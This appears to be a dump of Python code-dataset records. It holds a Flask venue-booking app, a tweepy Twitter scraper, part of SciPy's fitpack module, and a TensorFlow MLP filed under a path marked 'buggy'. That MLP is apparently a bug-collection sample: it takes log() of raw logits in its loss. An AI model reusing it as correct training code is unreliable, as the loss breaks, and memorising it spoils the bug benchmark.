of a SD card failure\r\n f.write(data + '\\n')\r\n # also add data to the message queue\r\n self.message_queue.put(self.data_dictionary.data)\r\n logging.debug(\"PROCESSOR thread exited!\")\r\n\r\n\r\n","sub_path":"classes/processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":3064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"40134771","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nassert tf.__version__ == \"1.8.0\"\ntf.set_random_seed(20180130)\n\nmnist = input_data.read_data_sets(\"/tmp/data\", one_hot=True)\n# one hidden layer MLP\n\nx = tf.placeholder(tf.float32, shape=[None, 784])\ny = tf.placeholder(tf.float32, shape=[None, 10])\n\nW_h1 = tf.Variable(tf.random_normal([784, 512]))\nh1 = tf.nn.sigmoid(tf.matmul(x, W_h1))\n\nW_out = tf.Variable(tf.random_normal([512, 10]))\ny_ = tf.matmul(h1, W_out)\n\n# cross_entropy = tf.nn.sigmoid_cross_entropy_with_logits(y_, y)\ncross_entropy = tf.reduce_sum(- y * tf.log(y_) - (1 - y) * tf.log(1 - y_), 1)\nloss = tf.reduce_mean(cross_entropy)\ntrain_step = tf.train.GradientDescentOptimizer(0.05).minimize(loss)\n\ncorrect_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n# train\nwith tf.Session() as s:\n s.run(tf.initialize_all_variables())\n\n for i in range(10000):\n batch_x, batch_y = mnist.train.next_batch(100)\n s.run(train_step, feed_dict={x: batch_x, y: batch_y})\n\n if i % 100 == 0:\n loss1, train_accuracy = s.run([loss, accuracy], feed_dict={x: batch_x, y: batch_y})\n print('step {0}, training accuracy {1}, loss {2}'.format(i, train_accuracy, loss1))\n","sub_path":"StackOverflow/IPS-7/35078027-buggy/MLP.py","file_name":"MLP.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"40305952","text":"#----------------------------------------------------------------------------#\n# Imports\n#----------------------------------------------------------------------------#\n\nimport json\nimport dateutil.parser\nimport babel\nfrom flask import Flask, render_template, request, Response, flash, redirect, url_for\nfrom flask_moment import Moment\nfrom flask_sqlalchemy import SQLAlchemy\nimport logging\nfrom logging import Formatter, FileHandler\nfrom flask_wtf import Form\nfrom forms import *\nfrom flask_migrate import Migrate\nimport sys\nfrom datetime import datetime\n#----------------------------------------------------------------------------#\n# App Config.\n#----------------------------------------------------------------------------#\n\napp = Flask(__name__)\nmoment = Moment(app)\napp.config.from_object('config')\n\n# TODO: connect to a local postgresql database\ndb = SQLAlchemy(app)\nmigrate = Migrate(app,db)\n\n#----------------------------------------------------------------------------#\n# Models.\n#----------------------------------------------------------------------------#\n\n# TODO Implement Show and Artist models, and complete all model relationships and properties, as a database migration.\n\nclass Show(db.Model):\n __tablename__ = 'Show'\n id = db.Column(db.Integer, primary_key=True)\n artist_id = db.Column('artist_id',db.Integer,db.ForeignKey('Artist.id'), nullable=False)\n venue_id = db.Column('venue_id',db.Integer,db.ForeignKey('Venue.id'), nullable=False)\n start_time = db.Column('start_time', db.TIMESTAMP, nullable=False)\n venue = db.relationship(\"Venue\",backref=\"Artist\")\n artist = db.relationship(\"Artist\",backref=\"Venue\")\n\n def __repr__(self):\n return f''\n\nclass Venue(db.Model):\n __tablename__ = 'Venue'\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String)\n city = db.Column(db.String(120))\n state = db.Column(db.String(120))\n address = db.Column(db.String(120))\n phone = db.Column(db.String(120))\n image_link = db.Column(db.String(500))\n facebook_link = db.Column(db.String(120))\n\n # TODO: implement any missing fields, as a database migration using Flask-Migrate\n genres = db.Column(db.ARRAY(db.String))\n website = db.Column(db.String(120))\n seeking_talent = db.Column(db.Boolean)\n seeking_description = db.Column(db.String(120))\n artist = db.relationship(\"Show\",backref=\"Venue\")\n\n def __repr__(self):\n return f''\n\nclass Artist(db.Model):\n __tablename__ = 'Artist'\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String)\n city = db.Column(db.String(120))\n state = db.Column(db.String(120))\n phone = db.Column(db.String(120))\n image_link = db.Column(db.String(500))\n facebook_link = db.Column(db.String(120))\n\n # TODO: implement any missing fields, as a database migration using Flask-Migrate\n genres = db.Column(db.ARRAY(db.String))\n website = db.Column(db.String(120))\n seeking_venue = db.Column(db.Boolean)\n seeking_description = db.Column(db.String(120))\n venues = db.relationship(\"Show\",backref=\"Artist\")\n\n def __repr__(self):\n return f''\n#----------------------------------------------------------------------------#\n# Filters.\n#----------------------------------------------------------------------------#\n\ndef format_datetime(value, format='medium'):\n date = dateutil.parser.parse(value)\n if format == 'full':\n format=\"EEEE MMMM, d, y 'at' h:mma\"\n elif format == 'medium':\n format=\"EE MM, dd, y h:mma\"\n return babel.dates.format_datetime(date, format)\n\napp.jinja_env.filters['datetime'] = format_datetime\n\n#----------------------------------------------------------------------------#\n# Controllers.\n#----------------------------------------------------------------------------#\n\n@app.route('/')\ndef index():\n return render_template('pages/home.html')\n\n\n# Venues\n# ----------------------------------------------------------------\n\n@app.route('/venues')\ndef venues():\n # TODO: replace with real venues data.\n # num_shows should be aggregated based on number of upcoming shows per venue.\n data = []\n ven = db.session.query(Venue.city,Venue.state).group_by('city','state').all()\n for city in ven:\n venueInfo = db.session.query(Venue.id,Venue.name).filter_by(city=city[0], state=city[1])\n infos = []\n for info in venueInfo:\n num = getNumUpcomingShows(info[0]) \n infos.append({'id':info[0],\"name\":info[1],\"num_upcoming_shows\":num})\n col = {\"city\":city[0], \"state\":city[1],\"venues\":infos}\n data.append(col)\n \n return render_template('pages/venues.html', areas=data);\n\n@app.route('/venues/search', methods=['POST'])\ndef search_venues():\n # TODO: implement search on artists with partial string search. Ensure it is case-insensitive.\n # seach for Hop should return \"The Musical Hop\".\n # search for \"Music\" should return \"The Musical Hop\" and \"Park Square Live Music & Coffee\"\n term = request.form.get('search_term')\n res = db.session.query(Venue.id,Venue.name).filter(Venue.name.ilike('%'+term+'%')).all()\n data = []\n for i in res:\n num = getNumUpcomingShows(i[0])\n data.append({\"id\":i[0],\"name\":i[1],\"num_upcoming_shows\": num }) \n response={\n \"count\": len(res),\n \"data\":data\n }\n return render_template('pages/search_venues.html', results=response, search_term=request.form.get('search_term', ''))\n\n@app.route('/venues/')\ndef show_venue(venue_id):\n # shows the venue page with the given venue_id\n # TODO: replace with real venue data from the venues table, using venue_id\n _data = db.session.query(Venue).get(venue_id)\n upcoming_shows_count ,upcoming_shows = getNumUpcomingShows(venue_id,'ven', 1)\n past_shows_count ,past_shows = getNumPastShows(venue_id,'ven',1)\n data1={\n \"id\": _data.id,\n \"name\": _data.name,\n \"genres\": _data.genres,\n \"address\": _data.address,\n \"city\": _data.city,\n \"state\": _data.state,\n \"phone\": _data.phone,\n \"website\": _data.website,\n \"facebook_link\":_data.facebook_link,\n \"seeking_talent\": _data.seeking_talent,\n \"seeking_description\": _data.seeking_description,\n \"image_link\":_data.image_link,\n \"past_shows\":past_shows,\n \"upcoming_shows\": upcoming_shows,\n \"past_shows_count\": past_shows_count,\n \"upcoming_shows_count\": upcoming_shows_count,\n }\n \n #data = list(filter(lambda d: d['id'] == venue_id, [data1, data2, data3]))[0]\n return render_template('pages/show_venue.html', venue=data1)\n\n# Create Venue\n# ----------------------------------------------------------------\n\n@app.route('/venues/create', methods=['GET'])\ndef create_venue_form():\n form = VenueForm()\n return render_template('forms/new_venue.html', form=form)\n\n@app.route('/venues/create', methods=['POST'])\ndef create_venue_submission():\n # TODO: insert form data as a new Venue record in the db, instead\n err =0\n\n if \"seeking_talent\" in request.form.keys():\n f = True\n else:\n f = False\n\n ven = Venue(name = request.form['name'],city=request.form['city'].upper(),state=request.form['state'],\n address=request.form['address'],phone=request.form['phone'],genres=request.form.getlist('genres'),\n facebook_link=request.form['facebook_link'],image_link=request.form['image_link'],\n website=request.form['website'],seeking_talent=f,seeking_description=request.form['seeking_talent_description'] )\n form = VenueForm(obj = ven)\n if form.validate() :\n try:\n db.session.add(ven)\n db.session.commit()\n except:\n db.session.rollback()\n print(sys.exc_info())\n err =1\n finally:\n db.session.close()\n \n # TODO: modify data to be the data object returned from db insertion\n if err == 0:\n name = db.session.query(Venue.name).filter_by(name=request.form['name']).order_by(db.desc(Venue.id)).first()[0]\n # on successful db insert, flash success\n flash('Venue ' + name + ' was successfully listed!')\n else:\n # TODO: on unsuccessful db insert, flash an error instead.\n flash('An error occurred. Venue ' + request.form['name'] + ' could not be listed.')\n return render_template('pages/home.html')\n else:\n if form.errors.__contains__('facebook_link'): flash(form.errors['facebook_link'][0])\n if form.errors.__contains__('website'): flash(form.errors['website'][0])\n if form.errors.__contains__('phone'): flash(form.errors['phone'][0])\n return render_template('forms/new_venue.html', form=form)\n\n\n\n@app.route('/venues/delete/', methods=['GET','DELETE'])\ndef delete_venue(venue_id):\n\n # TODO: Complete this endpoint for taking a venue_id, and using\n # SQLAlchemy ORM to delete a record. Handle cases where the session commit could fail.\n err=0\n try:\n db.session.query(Show).filter_by(venue_id=venue_id).delete()\n db.session.query(Venue).filter_by(id=venue_id).delete()\n db.session.commit()\n except:\n db.session.rollback()\n print(sys.exc_info())\n err = 1\n finally:\n db.session.close()\n \n if err == 0:\n flash(\"Venue Deleted Successfully\")\n else:\n flash(\"Error!! Could not delete Venue\")\n\n # BONUS CHALLENGE: Implement a button to delete a Venue on a Venue Page, have it so that\n # clicking that button delete it from the db then redirect the user to the homepage\n return render_template('pages/home.html')\n\n# Artists\n# ----------------------------------------------------------------\n@app.route('/artists')\ndef artists():\n # TODO: replace with real data returned from querying the database\n data = db.session.query(Artist.id,Artist.name).all()\n return render_template('pages/artists.html', artists=data)\n\n@app.route('/artists/search', methods=['POST'])\ndef search_artists():\n # TODO: implement search on artists with partial string search. Ensure it is case-insensitive.\n # seach for \"A\" should return \"Guns N Petals\", \"Matt Quevado\", and \"The Wild Sax Band\".\n # search for \"band\" should return \"The Wild Sax Band\".\n term = request.form.get('search_term')\n res = db.session.query(Artist.id,Artist.name).filter(Artist.name.ilike(\"%\"+term+\"%\")).all()\n _data = []\n for i in res:\n num_upcoming_shows = getNumUpcomingShows(i[0],'art')\n _data.append({\"id\":i[0],\"name\":i[1],\"num_upcoming_shows\": num_upcoming_shows })\n response={\n \"count\": len(res),\n \"data\":_data\n }\n\n return render_template('pages/search_artists.html', results=response, search_term=request.form.get('search_term', ''))\n\n@app.route('/artists/')\ndef show_artist(artist_id):\n # shows the venue page with the given venue_id\n # TODO: replace with real venue data from the venues table, using venue_id\n _data = db.session.query(Artist).get(artist_id)\n upcoming_shows_count ,upcoming_shows = getNumUpcomingShows(artist_id,'art', 1)\n past_shows_count ,past_shows = getNumPastShows(artist_id,'art',1)\n data={\n \"id\": _data.id,\n \"name\":_data.name,\n \"genres\": _data.genres,\n \"city\": _data.city,\n \"state\": _data.state,\n \"phone\": _data.phone,\n \"website\": _data.website,\n \"facebook_link\": _data.facebook_link,\n \"seeking_venue\": _data.seeking_venue,\n \"seeking_description\": _data.seeking_description,\n \"image_link\": _data.image_link,\n \"past_shows\": past_shows,\n \"upcoming_shows\": upcoming_shows,\n \"past_shows_count\": past_shows_count,\n \"upcoming_shows_count\": upcoming_shows_count,\n }\n \n # data = list(filter(lambda d: d['id'] == artist_id, [data1, data2, data3]))[0]\n return render_template('pages/show_artist.html', artist=data)\n\n# Update\n# ----------------------------------------------------------------\n@app.route('/artists//edit', methods=['GET'])\ndef edit_artist(artist_id):\n\n artist = Artist.query.get(artist_id)\n # TODO: populate form with fields from artist with ID \n form = ArtistForm(obj = artist)\n return render_template('forms/edit_artist.html', form=form, artist=artist)\n\n@app.route('/artists//edit', methods=['POST'])\ndef edit_artist_submission(artist_id):\n # TODO: take values from the form submitted, and update existing\n # artist record with ID using the new attributes\n err = 0\n if \"seeking_venue\" in request.form.keys():\n f = True\n else:\n f = False\n dict = {\n \"name\":request.form['name'],\n \"city\":request.form['city'],\n \"state\":request.form['state'],\n \"phone\":request.form['phone'],\n \"genres\":request.form.getlist('genres'),\n \"facebook_link\":request.form['facebook_link'],\n \"image_link\":request.form['image_link'],\n \"website\":request.form['website'],\n \"seeking_venue\":f,\n \"seeking_description\":request.form['seeking_venue_description'] }\n form = ArtistForm(obj=request.form)\n if form.validate():\n try:\n db.session.query(Artist).filter_by(id=artist_id).update(dict)\n db.session.commit()\n except:\n db.session.rollback()\n print(sys.exc_info())\n err = 1\n finally:\n db.session.close()\n \n if err == 0:\n flash(\"Updated Successfully\")\n else:\n flash(\"Error!! Not Updated\")\n \n return redirect(url_for('show_artist', artist_id=artist_id))\n else:\n if form.errors.__contains__('facebook_link'): flash(form.errors['facebook_link'][0])\n if form.errors.__contains__('website'): flash(form.errors['website'][0])\n if form.errors.__contains__('phone'): flash(form.errors['phone'][0])\n return render_template('forms/new_artist.html', form=form)\n\n@app.route('/venues//edit', methods=['GET'])\ndef edit_venue(venue_id):\n ven = Venue.query.get(venue_id)\n # TODO: populate form with fields from artist with ID \n form = VenueForm(obj = ven)\n \n # TODO: populate form with values from venue with ID \n return render_template('forms/edit_venue.html', form=form, venue=ven)\n\n@app.route('/venues//edit', methods=['POST'])\ndef edit_venue_submission(venue_id):\n # TODO: take values from the form submitted, and update existing\n # venue record with ID using the new attributes\n err = 0\n \n if \"seeking_talent\" in request.form.keys():\n f = True\n else:\n f = False\n dict = {\n \"name\":request.form['name'],\n \"city\":request.form['city'],\n \"state\":request.form['state'],\n \"phone\":request.form['phone'],\n \"genres\":request.form.getlist('genres'),\n \"facebook_link\":request.form['facebook_link'],\n \"address\":request.form['address'],\n \"image_link\":request.form['image_link'],\n \"website\":request.form['website'],\n \"seeking_talent\":f,\n \"seeking_description\":request.form['seeking_talent_description']\n } \n form = VenueForm(obj=request.form)\n if form.validate() :\n try:\n db.session.query(Venue).filter_by(id=venue_id).update(dict)\n db.session.commit()\n except:\n db.session.rollback()\n print(sys.exc_info())\n err = 1\n finally:\n db.session.close()\n \n if err == 0:\n flash(\"Updated Successfully\")\n else:\n flash(\"Error!! Not Updated\")\n\n return redirect(url_for('show_venue', venue_id=venue_id))\n else:\n if form.errors.__contains__('facebook_link'): flash(form.errors['facebook_link'][0])\n if form.errors.__contains__('website'): flash(form.errors['website'][0])\n if form.errors.__contains__('phone'): flash(form.errors['phone'][0])\n return render_template('forms/new_venue.html', form=form)\n# Create Artist\n# ----------------------------------------------------------------\n\n@app.route('/artists/create', methods=['GET'])\ndef create_artist_form():\n form = ArtistForm()\n return render_template('forms/new_artist.html', form=form)\n\n@app.route('/artists/create', methods=['POST'])\ndef create_artist_submission():\n err =0\n if \"seeking_venue\" in request.form.keys():\n f = True\n else:\n f = False\n\n art = Artist(name = request.form['name'],city=request.form['city'].upper(),state=request.form['state'],\n phone=request.form['phone'],genres=request.form.getlist('genres'),\n facebook_link=request.form['facebook_link'],image_link=request.form['image_link'],\n seeking_venue=f,seeking_description=request.form['seeking_venue_description'] )\n form = ArtistForm(obj = art)\n if form.validate() :\n try:\n db.session.add(art)\n db.session.commit()\n except:\n db.session.rollback()\n print(sys.exc_info())\n err =1\n finally:\n db.session.close()\n \n # TODO: modify data to be the data object returned from db insertion\n if err == 0:\n name = db.session.query(Artist.name).filter_by(name=request.form['name']).order_by(db.desc(Artist.id)).first()[0]\n # on successful db insert, flash success\n flash('Artist ' + name + ' was successfully listed!')\n else:\n # TODO: on unsuccessful db insert, flash an error instead.\n flash('An error occurred. Artist ' + request.form['name'] + ' could not be listed.')\n return render_template('pages/home.html')\n \n else:\n if form.errors.__contains__('facebook_link'): flash(form.errors['facebook_link'][0])\n if form.errors.__contains__('website'): flash(form.errors['website'][0])\n if form.errors.__contains__('phone'): flash(form.errors['phone'][0])\n return render_template('forms/new_artist.html', form=form)\n\n\n# Shows\n# ----------------------------------------------------------------\n\n@app.route('/shows')\ndef shows():\n # displays list of shows at /shows\n # TODO: replace with real venues data.\n # num_shows should be aggregated based on number of upcoming shows per venue.\n data = []\n shows_data = db.session.query(Show).all()\n for show in shows_data:\n art = db.session.query(Artist.name,Artist.id,Artist.image_link).filter_by(id=show.artist_id).all()\n ven = db.session.query(Venue.name,Venue.id).filter_by(id=show.venue_id).all()\n data.append({\n \"venue_id\": ven[0][1],\n \"venue_name\": ven[0][0],\n \"artist_id\": art[0][1],\n \"artist_name\": art[0][0],\n \"artist_image_link\": art[0][2],\n \"start_time\": str(show.start_time)\n })\n return render_template('pages/shows.html', shows=data)\n\n@app.route('/shows/create')\ndef create_shows():\n # renders form. do not touch.\n form = ShowForm()\n return render_template('forms/new_show.html', form=form)\n\n@app.route('/shows/create', methods=['POST'])\ndef create_show_submission():\n # called to create new shows in the db, upon submitting new show listing form\n # TODO: insert form data as a new Show record in the db, instead\n sh = Show(artist_id=request.form['artist_id'],venue_id=request.form['venue_id'],\n start_time=request.form['start_time'])\n err=0\n try:\n db.session.add(sh)\n db.session.commit()\n except:\n db.session.rollback()\n print(sys.exc_info())\n err =1\n finally:\n db.session.close()\n \n # TODO: modify data to be the data object returned from db insertion\n if err == 0:\n flash('Show was successfully listed!')\n else:\n flash('An error occurred. Show could not be listed.')\n\n return render_template('pages/home.html')\n\n@app.errorhandler(404)\ndef not_found_error(error):\n return render_template('errors/404.html'), 404\n\n@app.errorhandler(500)\ndef server_error(error):\n return render_template('errors/500.html'), 500\n\ndef getNumUpcomingShows(id, idType='ven', get_data=0):\n \n if idType=='ven':\n shows = db.session.query(Show.start_time,Show.artist_id).filter_by(venue_id = id).all()\n elif idType=='art':\n shows = db.session.query(Show.start_time,Show.venue_id).filter_by(artist_id = id).all()\n num = 0\n cur = datetime.today()\n info = []\n for show in shows:\n \n if (show[0].date() > cur.date() ) or (show[0].date() == cur.date() and show[0].time() > cur.time() ):\n num = num +1\n if idType == 'ven':\n art = db.session.query(Artist.name,Artist.image_link).filter_by( id=show[1] ).all()\n info.append({\n \"artist_id\": show[1],\n \"artist_name\": art[0][0],\n \"artist_image_link\": art[0][1],\n \"start_time\": str(show[0])\n })\n elif idType == 'art':\n ven = db.session.query(Venue.name,Venue.image_link).filter_by( id=show[1] ).all()\n info.append({\n \"venue_id\": show[1],\n \"venue_name\": ven[0][0],\n \"venue_image_link\": ven[0][1],\n \"start_time\": str(show[0])\n })\n if get_data == 1:\n return num,info\n return num\n\ndef getNumPastShows(id, idType='ven', get_data=0):\n if idType=='ven':\n shows = db.session.query(Show.start_time,Show.artist_id).filter_by(venue_id = id).all()\n elif idType=='art':\n shows = db.session.query(Show.start_time,Show.venue_id).filter_by(artist_id = id).all()\n num = 0\n cur = datetime.today()\n info = []\n for show in shows:\n if (show[0].date() < cur.date() ) or (show[0].date() == cur.date() and show[0].time() < cur.time() ):\n num = num +1\n if idType == 'ven':\n art = db.session.query(Artist.name,Artist.image_link).filter_by( id=show[1] ).all()\n info.append({\n \"artist_id\": show[1],\n \"artist_name\": art[0][0],\n \"artist_image_link\": art[0][1],\n \"start_time\": str(show[0])\n })\n elif idType == 'art':\n ven = db.session.query(Venue.name,Venue.image_link).filter_by( id=show[1] ).all()\n info.append({\n \"venue_id\": show[1],\n \"venue_name\": ven[0][0],\n \"venue_image_link\": ven[0][1],\n \"start_time\": str(show[0])\n })\n if get_data == 1:\n return num,info\n return num\n\nif not app.debug:\n file_handler = FileHandler('error.log')\n file_handler.setFormatter(\n Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')\n )\n app.logger.setLevel(logging.INFO)\n file_handler.setLevel(logging.INFO)\n app.logger.addHandler(file_handler)\n app.logger.info('errors')\n\n#----------------------------------------------------------------------------#\n# Launch.\n#----------------------------------------------------------------------------#\n\n# Default port:\nif __name__ == '__main__':\n app.run()\n\n# Or specify port manually:\n'''\nif __name__ == '__main__':\n port = int(os.environ.get('PORT', 5000))\n app.run(host='0.0.0.0', port=port)\n'''\n","sub_path":"projects/01_fyyur/starter_code/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":22247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"187959876","text":"import intlekt_importation.mongo as mongo\nimport urllib\nimport tweepy\nimport re\nfrom datetime import datetime\nfrom intlekt_importation.default_settings import CONSUMER_KEY, CONSUMER_SECRET, ACCESS_KEY, ACCESS_SECRET, MISSING_IMAGE\n\n\ndef authenticate():\n \"\"\"\n Returns\n -------------\n tweepy.api.API object for twitter requests\n \"\"\"\n auth=tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\n auth.set_access_token(ACCESS_KEY, ACCESS_SECRET)\n api=tweepy.API(auth, wait_on_rate_limit = True, wait_on_rate_limit_notify = True)\n return api\n\ndef get_list_url(user, slug):\n \"\"\"\n Parameters\n -------------\n user: str\n Twitter username\n slug: str\n Twitter list slug\n Returns\n -------------\n str: URL for the given twitter list slug\n \"\"\"\n return 'https://twitter.com/' + user + '/lists/' + slug\n\ndef get_user_url(user):\n \"\"\"\n Parameters\n -------------\n user: str\n Twitter username\n Returns\n -------------\n str: URL for the given twitter username\n \"\"\"\n return 'https://twitter.com/' + user\n\ndef get_search_url(search):\n \"\"\"\n Parameters\n -------------\n user: str\n search content\n Returns\n -------------\n str: URL for the given search content\n \"\"\"\n url = 'https://twitter.com/search?f=tweets&q=' + search\n return urllib.parse.quote(url, safe = \"!*'();:@&=+$,/?#[]\")\n\n\ndef get_source_array(tweet):\n source_array=['']\n for source_id in range(len(tweet.entities['urls'])):\n source_array.append('s:' + str(source_id))\n return source_array\n\n\ndef get_hashtags(tweet):\n hashtags={}\n for tag in tweet.entities['hashtags']:\n hashtags[tag['text']] = ''\n return hashtags\n\n\ndef get_image(tweet):\n if 'media' in tweet.entities.keys():\n image=tweet.entities['media'][0]['media_url']\n else:\n image=MISSING_IMAGE\n return image\n\n\ndef get_tweet_json(tweet, source_url):\n return {\n 'collected_on': tweet.created_at.strftime('%Y-%m-%d'),\n 'tags': get_hashtags(tweet),\n 'image': get_image(tweet),\n 'description': re.sub(r'http\\S+', '', tweet.text),\n 'page_url': tweet.entities['urls'][0]['expanded_url'],\n 'url': source_url\n }\n\n\ndef get_posts(tweet_cursor, tweet_count, time_limit, only_source, languages):\n \"\"\"\n Parameters\n -------------\n tweet_cursor: tweepy.Cursor\n Tweet cursor.\n Returns\n -------------\n mongodb compatible dictionnary made of posts that contained a source.\n \"\"\"\n posts={}\n # For refresh we have to map tweet.id and mongo_id\n # tweet.lang\n for tweet in tweet_cursor.items(tweet_count):\n if tweet.lang != 'und' and tweet.lang not in languages:\n continue\n if tweet.created_at < time_limit:\n break\n source_array=get_source_array(tweet)\n for source, source_id in zip(tweet.entities['urls'], source_array):\n posts[tweet.id_str + source_id]=get_tweet_json(tweet, source['expanded_url'])\n if len(tweet.entities['urls']) == 0 and not only_source:\n posts[tweet.id_str]=get_tweet_json(tweet, None)\n return posts\n\n\ndef get_user_cursor(user, api):\n \"\"\"\n Parameters\n -------------\n # user: str\n # twitter screen_name.\n # api: tweepy.api.API\n # object for twitter requests\n Returns\n -------------\n tweepy.Cursor object.\n \"\"\"\n return tweepy.Cursor(api.user_timeline, screen_name=user, include_rts=True)\n\ndef get_search_cursor(search, api):\n \"\"\"\n Parameters\n -------------\n # search: str\n # twitter search.\n # api: tweepy.api.API\n # object for twitter requests\n Returns\n -------------\n tweepy.Cursor object.\n \"\"\"\n return tweepy.Cursor(api.search, q=search, result_type=\"recent\", include_entities=True) \n\ndef get_list_members(user, slug, api):\n return list(tweepy.Cursor(api.list_members, user, slug).items())\n\n\ndef scrap_user(user, collection_id=None, curators=None, driver=None, count=0, time_limit='2006-03-20', only_source=True, languages=['en', 'fr']):\n user_url = get_user_url(user)\n if collection_id is None:\n collection_id, source_id = mongo.get_collection_source_id(user, curators, driver, user_url)\n\n time_limit = datetime.strptime(time_limit, '%Y-%m-%d')\n api=authenticate()\n posts=get_posts(get_user_cursor(user, api), int(count), time_limit, only_source, languages)\n mongo.store_collection(collection_id, source_id, posts, user, user_url)\n\ndef scrap_search(search, collection_id=None, driver=None, curators=None, count=0, time_limit='2006-03-20', only_source=True, languages=['en', 'fr']):\n search_url = get_search_url(search)\n if collection_id is None:\n collection_id, source_id = mongo.get_collection_source_id(search, curators, driver, search_url)\n\n time_limit = datetime.strptime(time_limit, '%Y-%m-%d')\n api=authenticate()\n posts=get_posts(get_search_cursor(search, api), int(count), time_limit, only_source, languages)\n mongo.store_collection(collection_id, source_id, posts, search, search_url)\n\ndef scrap_list(user, slug, collection_id=None, driver=None, curators=None, count=0, time_limit='2006-03-20', only_source=True, languages=['en', 'fr']):\n list_url = get_list_url(user, slug)\n if collection_id is None:\n collection_id, source_id = mongo.get_collection_source_id(slug, curators, driver, list_url)\n\n time_limit = datetime.strptime(time_limit, '%Y-%m-%d')\n api=authenticate()\n list_members=get_list_members(user, slug, api)\n for member in list_members:\n posts=get_posts(get_user_cursor(member.screen_name, api), int(count), time_limit, only_source, languages)\n mongo.store_collection(collection_id, source_id, posts, user, list_url)\n","sub_path":"intlekt_importation/twitter.py","file_name":"twitter.py","file_ext":"py","file_size_in_byte":5776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"495059859","text":"\"\"\"\nfitpack (dierckx in netlib) --- A Python-C wrapper to FITPACK (by P. Dierckx).\n FITPACK is a collection of FORTRAN programs for curve and surface\n fitting with splines and tensor product splines.\n\nSee\n https://web.archive.org/web/20010524124604/http://www.cs.kuleuven.ac.be:80/cwis/research/nalag/research/topics/fitpack.html\nor\n http://www.netlib.org/dierckx/\n\nCopyright 2002 Pearu Peterson all rights reserved,\nPearu Peterson \nPermission to use, modify, and distribute this software is given under the\nterms of the SciPy (BSD style) license. See LICENSE.txt that came with\nthis distribution for specifics.\n\nNO WARRANTY IS EXPRESSED OR IMPLIED. USE AT YOUR OWN RISK.\n\nTODO: Make interfaces to the following fitpack functions:\n For univariate splines: cocosp, concon, fourco, insert\n For bivariate splines: profil, regrid, parsur, surev\n\"\"\"\n\n__all__ = ['splrep', 'splprep', 'splev', 'splint', 'sproot', 'spalde',\n 'bisplrep', 'bisplev', 'insert', 'splder', 'splantider']\n\nimport warnings\nimport numpy as np\nfrom . import _fitpack\nfrom numpy import (atleast_1d, array, ones, zeros, sqrt, ravel, transpose,\n empty, iinfo, asarray)\n\n# Try to replace _fitpack interface with\n# f2py-generated version\nfrom . import dfitpack\n\n\ndfitpack_int = dfitpack.types.intvar.dtype\n\n\ndef _int_overflow(x, msg=None):\n \"\"\"Cast the value to an dfitpack_int and raise an OverflowError if the value\n cannot fit.\n \"\"\"\n if x > iinfo(dfitpack_int).max:\n if msg is None:\n msg = '%r cannot fit into an %r' % (x, dfitpack_int)\n raise OverflowError(msg)\n return dfitpack_int.type(x)\n\n\n_iermess = {\n 0: [\"The spline has a residual sum of squares fp such that \"\n \"abs(fp-s)/s<=0.001\", None],\n -1: [\"The spline is an interpolating spline (fp=0)\", None],\n -2: [\"The spline is weighted least-squares polynomial of degree k.\\n\"\n \"fp gives the upper bound fp0 for the smoothing factor s\", None],\n 1: [\"The required storage space exceeds the available storage space.\\n\"\n \"Probable causes: data (x,y) size is too small or smoothing parameter\"\n \"\\ns is too small (fp>s).\", ValueError],\n 2: [\"A theoretically impossible result when finding a smoothing spline\\n\"\n \"with fp = s. Probable cause: s too small. (abs(fp-s)/s>0.001)\",\n ValueError],\n 3: [\"The maximal number of iterations (20) allowed for finding smoothing\\n\"\n \"spline with fp=s has been reached. Probable cause: s too small.\\n\"\n \"(abs(fp-s)/s>0.001)\", ValueError],\n 10: [\"Error on input data\", ValueError],\n 'unknown': [\"An error occurred\", TypeError]\n}\n\n_iermess2 = {\n 0: [\"The spline has a residual sum of squares fp such that \"\n \"abs(fp-s)/s<=0.001\", None],\n -1: [\"The spline is an interpolating spline (fp=0)\", None],\n -2: [\"The spline is weighted least-squares polynomial of degree kx and ky.\"\n \"\\nfp gives the upper bound fp0 for the smoothing factor s\", None],\n -3: [\"Warning. The coefficients of the spline have been computed as the\\n\"\n \"minimal norm least-squares solution of a rank deficient system.\",\n None],\n 1: [\"The required storage space exceeds the available storage space.\\n\"\n \"Probable causes: nxest or nyest too small or s is too small. (fp>s)\",\n ValueError],\n 2: [\"A theoretically impossible result when finding a smoothing spline\\n\"\n \"with fp = s. Probable causes: s too small or badly chosen eps.\\n\"\n \"(abs(fp-s)/s>0.001)\", ValueError],\n 3: [\"The maximal number of iterations (20) allowed for finding smoothing\\n\"\n \"spline with fp=s has been reached. Probable cause: s too small.\\n\"\n \"(abs(fp-s)/s>0.001)\", ValueError],\n 4: [\"No more knots can be added because the number of B-spline\\n\"\n \"coefficients already exceeds the number of data points m.\\n\"\n \"Probable causes: either s or m too small. (fp>s)\", ValueError],\n 5: [\"No more knots can be added because the additional knot would\\n\"\n \"coincide with an old one. Probable cause: s too small or too large\\n\"\n \"a weight to an inaccurate data point. (fp>s)\", ValueError],\n 10: [\"Error on input data\", ValueError],\n 11: [\"rwrk2 too small, i.e., there is not enough workspace for computing\\n\"\n \"the minimal least-squares solution of a rank deficient system of\\n\"\n \"linear equations.\", ValueError],\n 'unknown': [\"An error occurred\", TypeError]\n}\n\n_parcur_cache = {'t': array([], float), 'wrk': array([], float),\n 'iwrk': array([], dfitpack_int), 'u': array([], float),\n 'ub': 0, 'ue': 1}\n\n\ndef splprep(x, w=None, u=None, ub=None, ue=None, k=3, task=0, s=None, t=None,\n full_output=0, nest=None, per=0, quiet=1):\n \"\"\"\n Find the B-spline representation of an N-D curve.\n\n Given a list of N rank-1 